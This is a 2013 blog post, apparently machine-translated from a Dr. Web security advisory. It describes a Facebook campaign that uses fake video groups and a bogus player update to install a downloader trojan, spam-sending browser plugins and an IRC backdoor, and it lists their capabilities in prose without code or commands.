Wednesday, February 6, 2013

A new wave of malware in Facebook

The company Dr. Web today warned of a new wave of malicious programs among users of social network Facebook.

This time for his own purposes attackers use the integrated application that allows to place on any Facebook pages HTML-code. Trojans are used to spread feykovye thematic groups, which house disguised as a video link to a malicious application.

In order to spread malware, cybercriminals have created in Facebook many thematic groups called Videos Mega or Mega Videos: on February 5, 2013 the total population reached several hundred. In each of these groups of criminals disguised as a video posted a link to an integrated social networking application that allows you to embed in any web page HTML-code. Visitor groups, wanting to view a provocative video, left click on the video thumbnail, thus activating a pre-existing script cybercriminals. This action on the screen displays a dialog box prompts you to update the video player built-in browser, and the design of the window copies the design of pages on Facebook.

If the user agrees to install an update to his computer starts a self-extracting archive that contains a malicious program Trojan.DownLoader8.5385. In this case, the Trojan (and other downloadable components it) has a legitimate digital signature, issued in the name of the firm Updates LTD by Comodo, so in the course of the installation of malicious applications are not trusted by the operating system.

Trojan.DownLoader8.5385 - a traditional Trojan downloader, whose main task is to download on the infected computer and run other malicious software. In this case, the Trojan downloads the plug-ins for browsers, Google Chrome and Mozilla Firefox, designed for mass mailing of invitations to different groups of Facebook, as well as for automatic installation marks Like in the social network.

Among other things, these malicious add-ins have the following features:

- receive data on users Facebook, listed as a Friend of the victim;
- Like set a mark on a page on a social network or an external link;
- provide access to the photo album on the web pages;
- join groups;
- users to send invitations to your friends list to join the group;
- post links on the "wall" of users;
- change status;
- Open the chat window;
- join the event page;
- users to send invitations to events;
- post comments to posts;
- send and receive offers.

Configuration file with all the necessary plug-ins for data downloaded to infected PCs belonging to criminals server. The above plugins are detected by antivirus software Dr.Web as Trojan.Facebook.310.

In addition Trojan.DownLoader8.5385 installs on the infected computer malware BackDoor.IRC.Bot.2344, able to unite infected workstations in botnets. This implements a backdoor Trojan and can execute commands sent to it using the protocol text messaging IRC (Internet Relay Chat), for which the bot connects to a specially created by hackers chat channel.

Among the directives that can perform BackDoor.IRC.Bot.2344, the following:

- command execution shell CMD;
- the ability to download a file from a specified URL and put it to the specified local folder;
- check, if specified in the command process;
- to the remote server list of running processes, obtained using the standard utility tasklist.exe;
- stop this process;
- run any application;
- loaded from the specified URL and install a browser plug-Google Chrome.

Thus, we can conclude that the current security policy embedded applications Facebook promotes Trojans.

No comments:

Post a Comment